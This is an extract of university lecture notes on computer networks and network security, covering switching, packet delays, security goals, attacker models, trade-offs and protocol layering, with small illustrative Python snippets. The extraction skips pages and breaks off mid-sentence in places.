Lecture Notes PDF
Important Notice:
Students can take their own notes, for example, on lecture slide set PDF
documents (available on the course website before each lecture). This document
and references in it marked as required reading (provided at the end of each
chapter) form a supplement to the lectures. They are meant to give more detail
and fill the gaps. In the exam, you are responsible for the lecture content, the
lecture notes (this document) and the required reading. Lecture slides will often
only contain illustrations of main ideas. Further explanation is provided during
the lecture, in the lecture notes and in required reading.
Each chapter of this document provides a literature section that describes
required reading and suggested reading. The required reading is part of the
exam material while the suggested reading is not. The suggested reading is
for students who are interested in background information, or in a different
perspective on or presentation of the material, which can help develop a better
and deeper understanding. Additional references to related work may be given
inside the text. These provide related materials and/or more in-depth discussions.
Interested students can learn more by reading these, but they are considered to
be outside the scope of assessment.
This is the first iteration of these notes; some flaws will be present and
improvement suggestions are welcome. Please report textual mistakes that you
come across to the e-mail address [email protected] and help us improve the
quality.
End of notice.
About this document
This document is meant as supporting material for the lectures in the Computer
Networks and Security (2IC60) course and the referenced reading materials. It
is not meant to be a stand-alone document. This document is still work in progress.
Thanks
The course material covered in these notes has been developed with contribu-
tions from Elisa Costante, Ricardo Corin, Jeroen Doumen, Sandro Etalle, Pieter
Hartel, Boris Skoric, Nicola Zannone, Igor Radovanovic and Johan Lukkien.
The authors would also like to acknowledge the sources of some of the figures
and exercises in this document.
Contents

1 Introduction
  1.1 Networks and Computer Networks
    1.1.1 Networks
    1.1.2 Computer Networks
  1.2 Push Behind Networks
    1.2.1 Technological Development
    1.2.2 Industrial Development
    1.2.3 Economic and Social Aspects
  1.3 Standards and Regulations on Networks
  1.4 Network Physical Infrastructure
    1.4.1 End Devices and Access Networks
    1.4.2 Network Core
  1.5 The Internet: Today
  1.6 Internet of Things (IoT): Tomorrow
  1.7 Network Security
    1.7.1 Security and Network Security Goals
    1.7.2 Threats
    1.7.3 Security Engineering
  1.8 Summary
    1.8.1 Literature
  1.9 Homework Exercises
3 Application Layer
  3.1 Application Layer Protocol: What is it and what is it not?
  3.2 Issues Solved by the Application Layer
    3.2.1 Application Architecture Styles
4 Transport Layer
  4.1 Issues Solved by the Transport Layer
  4.2 Addressing Processes and Packetization
  4.3 Connection and Connection-less Service
  4.4 Internet’s Layer 4 Protocols: UDP and TCP
    4.4.1 UDP
    4.4.2 TCP
  4.5 Summary
    4.5.1 Literature
  4.6 Homework Exercises
5 Network Layer
  5.1 Internetworking
  5.2 Datagram Networks
    5.2.1 Packetization
  5.3 Layer 3 Addressing and Subnetting
  5.4 Network Layer Routing
  5.5 Network Layer Connections: Virtual Circuits
  5.6 Summary
    5.6.1 Literature
  5.7 Homework Exercises
9 Cryptography
  9.1 Basics and Security Goals of Cryptography
  9.2 Symmetric Cryptography
  9.3 Public Key Cryptography
  9.4 Block modes: Encrypting more than one block
  9.5 Example Algorithms
    9.5.1 Data Encryption Standard (DES)
    9.5.2 Advanced Encryption Standard (AES)
    9.5.3 RSA
  9.6 Computational Security
  9.7 Summary
    9.7.1 Literature
  9.8 Exercises (not graded: exam preparation)
Introduction
Document structure
• Chapter 1 provides a general introduction to the concepts of computer
networks and (network) security.
• Chapter 2 explains how protocols govern computer networks and gives
an overview of protocol layering and protocol stacks.
• Chapter 3 introduces application layer concepts and the principles of
networked applications.
• Chapter 4 introduces transport layer services and widely used transport
layer protocols of the Internet.
• Chapter 5 gives an overview of network layer services for end device to
end device data delivery.
• Chapter 6 introduces the data link layer whose task is to transfer data
over a single (wired or wireless) link.
• Chapter 7 discusses key security issues at the network edge: authorization
(what resources can be used at the server side) and authentication (who
is present on the client side).
• Chapter 8 focuses more on the security aspects regarding network core
by looking at threats and corresponding countermeasures at the different
network layers.
• Chapter 9 discusses in detail an essential tool for network security: cryp-
tography.
• Chapter 10 explains how we can analyze the security properties of pro-
tocols.
Figure 1.2: To this day, the number of transistors that fit in an integrated circuit
follows Moore’s law closely. (Figure source: intel.com)
Figure 1.3: The number of devices connected to the Internet and their types
across years, with a projection until 2018. (Figure source: Cisco)
Moore’s law has an important consequence: devices that are currently just
not capable enough to connect to the Internet, due to a lack of computational
power, will soon be powerful enough. A recent report by Cisco indicates that
we are rapidly moving from the Internet of personal computers to an Internet
of smart phones, tablets and machine-to-machine (M2M) communications. All
projections are towards a future of the Internet that is dominated by data traffic
that does not involve any humans. Figure 1.3 by Cisco shows the profiles of the
devices connected to the Internet with projection until 2018.
1 Gordon E. Moore, “Cramming more components onto integrated circuits”, April 1965.
Figure 1.4: The total reach of the Internet technology is increasing rapidly, in
parallel with the industry that is associated with it. (Figure source: ITU)
3 Coursera is an Internet platform for massive open online courses. It hosts over a thousand
courses from many universities and serves students all around the world.
Figure 1.6: Worldwide B2C e-commerce sales volumes. The years marked with
a * are projections based on previous data. (Figure source: statista.com)
often does not result in user acceptance. For example, the Wireless Application
Protocol (WAP) was advertised with the slogan “Internet made mobile”, when in
fact it was just a new protocol that did not really have a big impact either socially
or economically. The Multimedia Messaging Service (MMS) was advertised as
a better replacement for the Short Message Service (SMS), but it could never
really replace or even come close to SMS. Multimedia integration into text messages
became huge only after services like WhatsApp, for which the convenience factor
is substantial.
In some developed countries, like Finland, citizens legally have a right to broadband
Internet. That is, in these countries, high speed access to the Internet is a civil right,
just like getting education and health care. Given this significant penetration into
societies, in every country (some more strict than others) the government wants
to regulate the use of the Internet. In doing so, their goals are many. Government
regulations can be, for example, for the sake of:
Figure 1.8: The network infrastructure consisting of end devices, access networks
and network core. (Figure by Kurose and Ross)
Figure 1.9: Smart spaces are advanced computer networks where the user is at
the center of everything, i.e. smart space applications are there to satisfy the user. Many
applications with various characteristics can be realized by devices that surround
the user. These can be provided by individual devices or collaboratively.
(private) network protocols dedicated to this purpose. Simple data retrieval
(sensing, diagnostics) is possible. Software updates over the network are possible,
but typically not straightforward (expert knowledge is needed).
• Network-connected embedded systems are ‘on-line’ using standard
protocols that are open to the public. Networks of these typically go by the
name “machine-to-machine networks”. An example is a body sensor node
that monitors posture of a person, warns when the posture is not right and
stores the data on a remote server for access by the physiotherapist.
• Network-central embedded systems have some standalone function
but the design of both hardware and software aims at operation in a net-
worked context. Examples are many smartphone apps, television
sets and intelligent lighting (e.g. Philips Hue).
• Fully networked embedded systems do not have a meaningful stan-
dalone function when they are disconnected from the network. These are
mostly cheap devices with elementary behavior. Very low resource devices
are typically fully networked. Examples are applications with simple
sensing, actuating and elementary computing.
In general, devices can be classified (as of today) as shown in Figure 1.11,
where each row corresponds to a different device class.
DSL gives a dedicated connection to the central office (the gateway to the
Internet core) and, therefore, provides dedicated access bandwidth to its indi-
vidual customers. Cable Internet connection, on the other hand, is shared among
neighbors, i.e. more than one household hooks up to the same cable line, resulting in
bandwidth sharing. Although outside of peak hours cable Internet is typically
faster than DSL, the effective bandwidth per household is likely to drop for
cable Internet during peak hours when a lot of people are online.
Figure 1.12: The sea of routers forming the network core (Figure by Kurose &
Ross).
Figure 1.13: Resources allocated to four different senders (color coded) in FDM,
TDM and a combination of FDM with TDM.
they pause between sentences and while listening to the other party. Resource
reservation is typically done (by means of a call setup procedure) considering
the maximum amount of resources needed at any given instance during a ses-
sion. This in combination with not sharing resources brings the disadvantage
that the resources that are not used by the current session remain idle, which
is a waste.
By dividing the network resources among sessions, what circuit switching
does is indeed dividing the network into logical pieces, each of which is accessible
to only one session. But how can we divide a link (e.g. a wire) into logical pieces?
This can be done, for example, using Frequency Division Multiplexing (FDM),
Time Division Multiplexing (TDM), Code Division Multiplexing (CDM) or a
combination of these.
In FDM, a different frequency subband is allocated to every session. Part
of the allocated frequency band is used for receiving (downlink) while the re-
maining part is used for sending (uplink). In TDM, a different time slice of a
(fixed) time period is allocated to every session. Resources allocated to different
senders in FDM, TDM and a combination of FDM with TDM are visualized in
Figure 1.13.
In CDM, every session uses a signal code which is orthogonal to all the
other codes used by other transmitters, such that multiplying the received signal
by the session’s own code (and summing) yields zero for all transmissions except
the transmissions of this specific session.
Figure 1.15: Store and forward behavior example with 2 routers between the
sender and the receiver. (Figure by Kurose and Ross)
must arrive at the router before it can be transmitted on the next link. It takes
L/R seconds to transmit (push out) a packet of size L bits onto a link at a rate of
R bps (bits per second). For the example given in Figure 1.15, the transmission
delay experienced by the packet is 3L/R seconds (i.e. L/R for the transmission
from the source, and 2L/R for the transmissions from the routers).
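As a quick sanity check of the 3L/R figure above, the short computation below uses illustrative numbers (a 1000-byte packet and 1 Mbps links, chosen only for this example) and adds up the per-hop transmission delays on a path with two routers, ignoring propagation, processing and queuing delay.

```python
# Store-and-forward transmission delay on a path with two routers
# (three links), ignoring propagation, processing and queuing delay.
L = 8_000         # packet size in bits (example: 1000 bytes)
R = 1_000_000     # link rate in bits per second (example: 1 Mbps)
links = 3         # source -> router 1 -> router 2 -> destination

per_link = L / R            # seconds to push the whole packet onto one link
total = links * per_link    # the packet must be fully received before forwarding
print(per_link, total)      # 0.008 s per link, 0.024 s in total (= 3L/R)
```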
Packet switching allows more users to use the network at the same time, i.e.
there is no call admission process. This comes at the expense of losing quality
guarantees (see the exercise at the end of the chapter).
As given by the taxonomy of Figure 1.7, it is also possible to realize virtual
circuits using packet switching. The term ‘virtual’ implies that even though the
connection is packet switched (i.e. each packet uses the entire channel resources),
the multiplexing of packets can be done in such a way to provide circuit-like
guarantees for selected sessions. We will come back to this topic later.
Figure 1.16: The number of “things” that are connected to the Internet will
be 50 billion by the year 2020 according to the Cisco Internet Business Solutions
Group (IBSG) report. (Figure by Cisco)
Just try to think of a world without the Internet. In today’s world, this is
almost unimaginable. Vital services of the government and the business sector
depend on the Internet. Not to mention that most people would be very upset
by its absence, since being “always on(line)” is nowadays crucial to many people.
• very small packet size: an IP packet may not be delivered in one go.
Physically The IoT is the Internet plus an extension of the Internet into
the physical world surrounding us, which is monitored and affected by things:
constrained devices with limited memory, processing power, energy and acces-
sibility. Things are connected through Internet-enabled constrained networks
(the constraints deriving from the device constraints), which are then united
with fast networks and regular Internet services.
Figure 1.18: The C-I-A triad and security attributes in a network context.
Logically The IoT stands for the vision of the Internet of tomorrow. It is
a global facility that extends the reach of distributed applications to billions
of resource-poor devices. The IoT brings endless possibilities for innovative
scenarios (e.g. smart homes, smart health care, smart buildings, smart cities),
characterized by the fact that distributed IoT applications consist of collaborat-
ing services running on many distinct devices.
Figure 1.19: Two views on privacy on the Internet. (Cartoon by Nik Scott, 2008)
ferent from integrity in that it focuses on data coming from the ‘correct’ source
rather than on data not being changed along the way. A signature on a contract
would be an example of a way to achieve non-repudiation; you cannot later deny
agreeing to the conditions in the contract. The relation between accountability
and non-repudiation is similar to that between integrity and authenticity; non-
repudiation can be an important part of achieving accountability but is by itself
not sufficient.
The security requirements together with the security policies of a system
tell you what attributes should be achieved when (in which context). The
requirements will typically say what security attributes should be achieved by
which components and/or for what type of resources (e.g. confidential database
entries should only be readable by users with the right clearance). Security
policies detail this, e.g. by stating what type of data is confidential and what
(types of) users have clearance. Security requirements are an integral part of
the design of the system, while changes of policies are typically anticipated
and should not invalidate the design. Note, however, that the term security
policy is widely used and the exact interpretation varies. It can range from a
high-level textual description meant to be understood and applied by human beings,
e.g. “all personal identifiable information must only be read when needed to
provide a service”, to low-level computer-readable information, e.g. “drwxr-xr-x”5.
Translating high-level policies into a system design along with low-level
policies is an important step of creating a secure system.
The exact meaning of a security policy can be given within a security model; a
(formal) framework to express and interpret policies. For example, the Unix file
permission given above can be interpreted as a relation between Users, Groups,
Objects and Permissions: An object (e.g. a directory) has an owner user and
a group (an additional part of the security policy) and the owner of the object
has read, write and execute permission, while members of the group as well as
other users have only read and execute permission.
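As a small illustration of interpreting such a low-level policy, the sketch below (an example for these notes, not a required tool) decodes a Unix-style permission string such as “drwxr-xr-x” into the read/write/execute rights of the owner, the group and other users.

```python
# Decode a Unix-style permission string such as "drwxr-xr-x" into
# per-class permission sets (owner, group, others).
def decode_mode(mode: str) -> dict:
    assert len(mode) == 10, "expected a type character plus 9 permission characters"
    perms = {}
    for i, who in enumerate(("owner", "group", "others")):
        triplet = mode[1 + 3 * i : 4 + 3 * i]      # e.g. "rwx" or "r-x"
        perms[who] = {
            "read": triplet[0] == "r",
            "write": triplet[1] == "w",
            "execute": triplet[2] == "x",
        }
    return perms

print(decode_mode("drwxr-xr-x")["group"])
# {'read': True, 'write': False, 'execute': True}
```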
1.7.2 Threats
The security attributes of the system may be at risk from several types of threats.
Besides the usual problems such as program errors and system failures, security
also needs to address malicious entities, which are specifically trying to break the
system. This is very challenging; every day seems to bring new security incidents
where attackers are able to exploit (previously unknown) security weaknesses.
Although this may give a skewed perspective (a system remaining secure yet
another day will not make the news), it does show the importance of applying
the right mechanisms for securing your system.
To decide what the right mechanisms are to achieve the security requirements
of the system, we need to know whom we want to protect against. Protecting
information in a database from an outsider requires different solutions than
protecting it from the database administrator. We thus need an attacker model.
This attacker model captures the capabilities and possibly the intentions of
an attacker. For example, in a network setting we may distinguish between
attackers that can only listen in (eavesdrop) and those that can block and/or
modify communication.
5 A Unix-style file “read-write-execute” permission setting.
Design There is no hope of having a secure system if the system design does
not address security goals or, worse, has inherent features/goals that imply
security problems. As an example, consider the Windows Meta File (WMF)
format, where arbitrary code execution, a clear security risk, is a design feature.
As another example one can consider the Internet; initially the Internet
linked a group of trusted systems. Security goals that are very important
now were thus not under consideration in its design, e.g. there is no protection of
content, any computer can claim any IP address, there is no authentication of DNS,
etc. Of course there are currently security mechanisms (IPsec, HTTPS,
etc.) that try to remedy this, but ‘add-on security’ is always problematic;
security needs to be considered from the start.
Security Tool Selection Choose your crypto well, especially if you are a
mafia boss. From a news article: “...He apparently wrote notes to his
henchmen using a modified form of the Caesar Cipher, which was easily
cracked by the police and resulted in further arrests of collaborators...”
Clearly here the selected security tool was grossly insufficient to reach the
security goal.
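To see just how weak this tool is, the sketch below brute-forces a Caesar-enciphered message (the ciphertext and shift are made up for this example): there are only 26 possible keys, so trying them all and looking for readable text takes no effort at all.

```python
# Brute-force attack on the Caesar Cipher: only 26 keys to try.
def shift(text: str, k: int) -> str:
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            out.append(chr((ord(ch) - base + k) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)

ciphertext = "PHHW DW GDZQ"           # example message encrypted with shift 3
for k in range(26):
    print(k, shift(ciphertext, -k))   # key 3 reveals "MEET AT DAWN"
```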
Of course these are only examples and there are many more aspects of a
system where a weak link in the security chain may occur. The key points are
that one needs to consider the system as a whole and consider security from the
start.
We have already seen some security tools (means) above and later we will try
to add key tools to this toolbox, focusing on network scenarios. Cryptography
is an important part of this toolbox. However recall that security tools by
themselves do not make the system secure. A common claim ‘the data is secure
because it is encrypted’ is by itself meaningless and may even indicate that
the security goals and the attacker model have not been sufficiently considered.
For instance, encryption offers no protection against inside attackers who have
access to the key. A good security design determines what security tools need
to be employed where and when, considering the security requirements and the
effects (including trade-offs) different tools have on these requirements.
Trade-offs
“The only truly secure system is one that is powered off, cast in a
block of concrete and sealed in a lead-lined room with armed guards.”
E. Spafford
Such a system may be secure but not very useful. (Actually, it may not be
secure at all; which security attribute is clearly not satisfied? Then again, without the
security goals we cannot answer this question...) There is often a clear trade-off
between security and usability (why do I need to remember that password...),
performance (e.g. using encryption adds computation time) and costs (e.g. re-
placing pin cards and readers by smart card enabled versions). There is also a
trade-off between different security attributes e.g. confidentiality and availabil-
ity. We have to be able to answer the question: Which trade-offs are worthwhile;
e.g. how much security do we gain for the performance we give up?
Why does security often not get the attention it needs? For one, if it is
good you do not see it. Would you pay 50 Euro more for a television if it
was more secure? Does your answer depend on ‘how much’ more secure? It is
also hard to quantify security. You can say that a ‘product is 2 times faster’
and convince every consumer with some notion of why and how much better
the product is, even though this statement is usually much more complex than
it seems. However, what does ‘this product is 2 times more secure’ mean?
There are many discussions on which product is more secure, e.g. comparisons
between Windows and Linux, Firefox and Internet Explorer, Mac and PC, etc.
Claims are supported by quoting the number of bugs/vulnerabilities reported,
the number of security incidents, etc. But how well do any of these really reflect
the overall ‘security’ of a system? Thinking back to the earlier discussion about
what is ‘security of a system’ one can see that no single number could really
adequately capture this. Still, what quantification is possible? If we try to focus
our attention on a single aspect of security and a single application area, one
may be able to give some numbers that make sense (just remember that, the
more general the statement the less objective a score is likely to be).
For cryptographic primitives one can look at the (computational) cost of
breaking a system. This is often expressed by the entropy that it offers in a
given setting, e.g. ‘this crypto system offers 80 bits of security’ reflects that
the amount of computation needed to break it is similar to brute-forcing an
80-bit key, i.e. trying 2^80 different possibilities. This is generalized to a measure
for security of systems by considering the cost (computational or otherwise) of
breaking the system’s security; e.g. it would take 2 years and a budget of 10
million euros to break this system (i.e. violate a specific security goal of the
system).
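As a rough back-of-the-envelope check of what ‘80 bits of security’ means, the computation below assumes an attacker who can test 10^12 keys per second (an arbitrary, optimistic figure chosen for this example) and estimates how long an exhaustive search over 2^80 keys would take.

```python
# Back-of-the-envelope cost of brute-forcing an 80-bit key.
keys = 2 ** 80                    # number of possibilities to try
rate = 10 ** 12                   # assumed attacker speed: 10^12 keys per second
seconds_per_year = 365 * 24 * 3600

worst_case_years = keys / rate / seconds_per_year
print(f"worst case: {worst_case_years:.1e} years, "
      f"average: {worst_case_years / 2:.1e} years")
# roughly 3.8e4 years in the worst case, even at this generous key-testing rate
```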
For web applications several security metrics have been defined by checking
for common security issues and assigning a risk to each of them. For example,
the CCWAPSS common criteria for web application security scoring [8] com-
putes a score based on a list of eleven criteria. Each criterion has to be checked
(rating the web service on a scale from 1 to 3 for each item) and assigned a risk
level based on the difficulty and impact of an attack.
Their interests and goals thus have to be considered (though not necessarily
completely reached - we may need to make trade-offs between the different
goals of the participants).
The stakeholders and their interests become the initial actors and goals in
the requirements gathering process. If an agent has the right capabilities,
it may adopt a goal, i.e. take responsibility to achieve it. If an agent does
not adopt the goal it may be delegated to other agents (either existing
or new) or be split into new sub goals. Agents do not work in isolation;
agents and their goals may depend on/interact with each other. These
dependencies should be identified and could lead to new goals and/or
agents. They also lead to potential vulnerabilities, e.g. when agents’ goals
conflict.
So far the process matches a typical functional requirement engineering
approach. In order to deal with security requirements we also need to
consider attackers and possible attacks on the system.
1.8 Summary
The goal of this chapter was to introduce the most basic and fundamental con-
cepts of computer networks and network security, as well as the motivations
for their existence. You now know the principal nuts and bolts of a computer
network, the idea behind network protocols and protocol layering. A simple
overview of the Internet and the Internet protocol stack has been provided in
our discussion, together with an outlook into the future of the Internet domi-
nated by machine-to-machine communication, i.e. the Internet of Things. After
our security discussion, you will never look at the word ‘secure’ in the same
way again: Whenever you encounter ‘secure’ always think - what set of security
requirements (which security attributes for which resources) are really meant
by ‘secure’ (what are the security policy and model) and what type of attacker
is considered (what is the attacker model). The notions introduced here will
return in more detail in the chapters that follow.
1.8.1 Literature
Other required reading
• Article titled “A goal oriented approach for modeling and analyzing secu-
rity trade-offs” [15].
– http://www.cs.utoronto.ca/~gelahi/GEER-ER07.pdf
– https://dl.packetstormsecurity.net/papers/web/ccwapss_1.1.pdf
Suggested reading
• The pharmacy sends your prescription to your home but also starts
sending you advertisements for products.
• Your medicine is lost in the mail.
5. Consider again the prescription for medicine from your GP that is filled
by a pharmacy sending the medicine to your home mentioned in the re-
view questions. Create a (textual) security policy for this scenario which
describes which security properties (attributes) must be satisfied when. In-
dicate the involved security attributes for different statements in your
policy.
6. An online music store allows its members to listen to music with embedded
ads for free and to download music without ads for a fee. Members can
also recommend songs to other members and get a free ringtone if at
least five people listen to a song based on this recommendation. Do the
first steps in a basic ‘security requirements engineering’ for this scenario:
identify actors, their interests and interdependencies. Also find attackers
and their goals. (As we discuss security tools in later chapters, you can
enhance this design by extending it with potential countermeasures.)
7. Find a security related news article and analyze it (collect some back-
ground information when needed).
2. Whenever you come across existing trails that are stronger, join them.
3. Once you find food, follow the pheromone trail back to the nest.
Figure 2.1 shows a typical purchase protocol defining the way we buy food
at the cafeteria. An important observation is that the cashier starts serving
the customer only after the customer has waited for her turn in the queue. Some sort of
greeting (“Hello” in this example message flow diagram) starts their interaction
and another greeting (“Bye” in this example) ends their interaction. After this
point the cashier can start serving the next customer.
Note that the figure shows only the “relevant” interactions and skips details
such as “the customer takes out her wallet”. In general, the description of
a protocol should be as detailed as needed. Details that do not matter are
skipped. For example, a certain customer may not carry a wallet and just keep
the money in his pocket. Protocols are detailed further until all ambiguities
regarding the operation are completely removed.
As another example, there is a social protocol in every culture. In the Nether-
lands, during a conversation, one has to wait until the other person stops speak-
ing. Interrupting others when they are speaking is perceived as rude behavior.
Likewise, one who is speaking should give others the opportunity to respond.
This is how you can get a conversation going. Looking at your mobile phone
while someone is talking to you is impolite.
Figure 2.2: Protocol layering: Layers above use the services of the layers below.
Large networks like the global Internet have to deal with the complexity at
the corresponding large scale. For example, a message created by an electric car
about its usage patterns while it is on the move should be able to find its way
to a database implemented in a large server rack of the car company somewhere
across the globe.
A protocol layer refers to a group of related functions that are performed
in a given level in a hierarchy (of groups of related functions). Protocol layer-
ing divides complex network protocols into simple network protocols. Protocol
layers above make use of the functions of the layers below as depicted in Fig-
ure 2.2. A set of horizontal protocols together with the interactions between
the different layers defines a layered protocol stack.
As an analogy, consider the following list of horizontal protocols that govern
a restaurant environment and the way of operation there.
Note that the table set-up protocol needs the services of the table cleaning
protocol (tables are first cleaned and then set up). Similarly, the seat manage-
ment protocol needs the services of the table set-up protocol (a table needs to be
set up before it can be given to customers). One thing to notice here is that each
of these individual protocols can be modified independently, without affecting
the other protocols. For example, the cleaning personnel can change and they
can do cleaning differently. However, this changes nothing in the table set-up
protocol. The corresponding protocol stack is shown in Figure 2.3.
It is also possible to make a vertical (monolithic) protocol design without
using protocol layering; i.e. a single protocol that governs communication. In
vertical protocol design, each new application has to be re-implemented per
device type, per operating system, per access link technology.
While dealing with complexity, layering brings overhead, i.e. the perfor-
mance of a layered protocol stack is sub-optimal (extra headers, extra process-
ing, etc.). For that reason, for applications with simple communication, where
resource management and optimization is the main concern and where there is
a dedicated (embedded) hardware platform, a vertical design may be preferable.
For example, consider sending a robot to Mars. The software of the robot has
to be optimized such that a lot of functionality can fit in a small volume and
weight. In the past vertical protocol design for embedded wireless sensor devices
was the common practice due to a severe lack of resources. This is no longer the case, since
current devices in classes D1 and above are able to manage lightweight Internet
protocol stacks.
Horizontal protocol design and protocol layering are our choices when sim-
plicity and convenience are the main concerns instead of resource optimization.
The Internet would not have been possible without protocol layering.
Figure 2.4: Network protocol stacks allow convergence from a large set of phys-
ical layers to protocols and divergence from protocols towards a huge set of
applications. (Figure by Johan Lukkien).
networks and others will possibly look more complex and detailed. The “good”
news is, we will not go into very complex protocols in this course. However,
the fundamental knowledge that you acquire in the course should enable you to
study any protocol stack and understand it easily.
(4) Transport Layer: The transport layer (layer 4) is responsible for trans-
port of application layer messages between (remote) processes. The transport
layer protocol must keep track of application data from several processes and
package those in transport layer packets called segments with certain labeling.
It relies on the network layer (layer 3) for delivery of segments between the
end-devices containing the processes. The receiver side of the transport layer
protocol delivers the messages within those segments to the corresponding re-
ceiver processes using the segment labeling. In addition to process-to-process
delivery, transport layer services also include reliable data transfer, flow control
(match speed between sender and receiver), and congestion control (keep the
network load below capacity).
(3) Network Layer: The network layer (layer 3) is responsible for end-to-end
packet delivery between two devices (from the original source to a destination)
that are attached to different (sub)networks. A network layer packet is called
a datagram and contains a transport layer segment as its payload. Other
important services of the network layer are logical addressing, routing, error
handling and quality of service control. In their end-to-end path from source
to destination, datagrams pass through many routers and links between routers.
The network layer relies on the services of the link layer (layer 2) for delivery
on a single link, e.g. between two consecutive routers.
(2) Data Link Layer: A link layer (layer 2) packet is called a frame. It
contains a network layer datagram, which it carries to the next node (either a
router or the destination host) on the end-to-end route. Link layer services also
include physical addressing, medium access control (MAC), link flow control
and error handling. A link can be wired or wireless. The set of all devices
interconnected via the link layer is called a network or a subnet.
(1) Physical Layer: The physical layer (layer 1) operates on individual bits
and it is responsible for moving bits (actually, electrical, optical, magnetic or
radio signals representing bits) from one node to the next. The original design
of the TCP/IP protocol suite did not have this layer and it was added later.
Because of the last principle, the OSI design and the Internet design bear
a lot of similarities. In fact, the five layers of the Internet protocol stack are
equivalent to the layers 1, 2, 3, 4 and 7 of the OSI protocol stack.
Presentation Layer: Sometimes the data sent from the source needs to be
translated into a different format for the destination to understand. The presen-
tation layer deals with the differences in data representations of the communi-
cating entities in terms of syntax. It translates different character sets of hosts
using different operating systems to each other, e.g. converting a text file that is
ASCII-coded to its EBCDIC-coded version. Compression and decompression of
Figure 2.7: Example protocol stacks in relation to the OSI model. (Figure by
Radovanovic)
data can be implemented in this layer. Some encryption and decryption pro-
tocols can also be implemented, e.g. the Secure Sockets Layer (SSL) protocol.
Many network protocol stacks lack this layer since the associated functions are
often not needed and they can be implemented in the other layers.
Session Layer: The role of the session layer is to establish, maintain and close
communication sessions, i.e. a persistent connection and the corresponding data
exchange between two remote processes. An example of a session is a voice call
session.
Figure 2.7 gives an overview and examples of different instantiations of the
OSI model by different parties.
Note that services are not the same as protocols. A service defines
what operations can be performed but it says nothing about how these opera-
tions are performed. A service interface between different layers defines how
to access the services of the lower layer. A protocol, on the other hand, de-
termines how exactly the service is implemented and defines a set of rules and
packet formats for this purpose.
Data encapsulation is a typical service of a protocol layer. Every protocol
layer (except layer 1 which only deals with bits and not data units) implements
data encapsulation as one protocol layer’s data is payload for the layer below it.
Every protocol layer deals with its own type of packet, and its own protocols,
without depending on the other layers. Figure 2.9 shows data encapsulation in
the Internet.
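As an illustration of encapsulation, the toy sketch below uses made-up header fields (real headers are binary and far richer) to show how each layer simply wraps the data handed down from the layer above, and how the receiver unwraps it again layer by layer.

```python
# Toy illustration of data encapsulation: each layer adds its own header
# around the payload handed down by the layer above (field names are made up).
message  = "GET /index.html"                           # application layer message
segment  = {"src_port": 52100, "dst_port": 80, "payload": message}
datagram = {"src_ip": "192.0.2.10", "dst_ip": "192.0.2.80", "payload": segment}
frame    = {"src_mac": "aa:bb:cc:00:00:01", "dst_mac": "aa:bb:cc:00:00:02",
            "payload": datagram}

# The receiver decapsulates in the reverse order, one layer at a time.
print(frame["payload"]["payload"]["payload"])          # -> "GET /index.html"
```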
As mentioned earlier, in the Internet terminology application layer packets are
called messages, transport layer packets are called segments, network layer packets
are called datagrams and link layer packets are called frames.
Nodal Processing Delay: Routers spend some time doing some simple pro-
cessing for every packet that they receive in one of their network interfaces.
Such processing includes, for example, checking for bit errors inside the packet.
Queuing Delay: After the nodal processing has been completed, the packet
still has to wait in line in a packet queue at the selected outgoing link of
the router for being transmitted. This is because packets are transmitted
one by one by the routers at each of their outgoing links. The queuing
delay depends on the network packet traffic. If there is congestion in the
network, then the queuing delay becomes by far the dominating factor in
the overall delay.
Transmission Delay: The store and forward behavior means that packets
must experience a transmission delay at each router, i.e. time needed
for fully transmitting all bits of the packet. This happens at each router
(and on each link) that they pass through. The transmission time de-
pends on the link throughput2 of the link and varies across links as we
discussed earlier. If the outgoing link throughput is R bps and the packet
length is L bits, then the time it takes to send L bits into the link is equal
to L/R seconds. Transmission delay can be significant for slow links.
Propagation Delay: It takes time for a single bit (or the signal symbol rep-
resenting the bit) to travel the distance across a wire (or wireless medium).
Depending on the transmission medium, the propagation speed of bits is
close to the speed of light. However, even at this speed, the propagation
delay on very long links (e.g. intercontinental or satellite links) becomes
noticeable. This delay (on a single link) is equal to the distance divided
by the propagation speed. The propagation delay can vary from a few
microseconds to hundreds of milliseconds in practice.
The total nodal delay is equal to the sum of the nodal processing delay, the
queuing delay of the node, the transmission delay onto the next link and the
propagation delay experienced on that link.
The end-to-end network packet delay is equal to the sum of all four delay
components for all nodes passed through before reaching the destination.
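Putting the four components together, the sketch below uses arbitrary example numbers (packet size, link rate, link length and propagation speed are all chosen just for illustration) to compute the nodal delay for one hop and sum it over the hops of a path.

```python
# Per-hop nodal delay = processing + queuing + transmission + propagation,
# summed over all hops of the path (example numbers, not a real network).
L = 12_000        # packet size in bits (1500 bytes)
R = 10_000_000    # link rate in bits per second (10 Mbps)
d = 100_000       # link length in meters (100 km)
s = 2.0e8         # propagation speed in the medium (meters per second)

def nodal_delay(processing=1e-5, queuing=0.0):
    transmission = L / R     # time to push all bits onto the link
    propagation = d / s      # time for a bit to travel across the link
    return processing + queuing + transmission + propagation

hops = 3                     # e.g. the source plus two routers
print(hops * nodal_delay())  # end-to-end delay, assuming identical, empty hops
```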
Data packet loss occurs if a packet arrives at a full queue at a router. In this
case, one of the packets in the router’s queue (e.g. the newly arriving packet)
has to be discarded. This is the reason for losing a lot of packets during network
congestion.
If the total delay between the source and the destination is somehow too
high, this may also cause situations which effectively translate to data loss. For
example, a video frame which passed its playback time during a video session
is not useful and cannot be used, i.e. there is no way to fix the past.3
2 The rate (bits per second) at which bits are transferred onto a link.
3 On the other hand, such data can still be used by some modern video codecs to increase
the quality of future video frames.
Throughput gives the rate (bits/second) at which the bits that are pumped
into the network by the sender side reach the destination (after some delay, of
course). For a good user experience, an application that requires processing of
R bits every second (for example, consider streaming of a video that uses R bits
to encode every second of footage) needs a network throughput of roughly R
bits per second. There is a simple reason for this: the video player needs to
consume R bits every second (convert those bits into video frames), which it can
only receive through the network. When the network throughput is consistently
lower than this minimum requirement R the video at the receiver will inevitably
freeze since the receiving device is not getting the bits fast enough to consume
them in a timely manner. This is what you experience when your smart phone
switches from 4G to 3G while you are watching a high-definition YouTube video.
2.6 Summary
The goal of this chapter was to give the motivation for protocol layering and
introduce it as a general network concept. We have explained how this concept
applies to the well-known OSI reference model and to the Internet model. You
should now be able to study layered protocol stacks and understand the ser-
vice model provided by each layer. Layering is not optimal performance-wise.
However, the gain from reduced complexity and increased flexibility (modular
design) is so high that protocol layering is widely used in computer networks.
Nevertheless, we also have to acknowledge the existence and the use of
vertical protocols in practice. A vertical protocol is a single protocol that
governs the operation of everything all the way from hardware function to appli-
cation function. Although this typically results in better performance, it makes
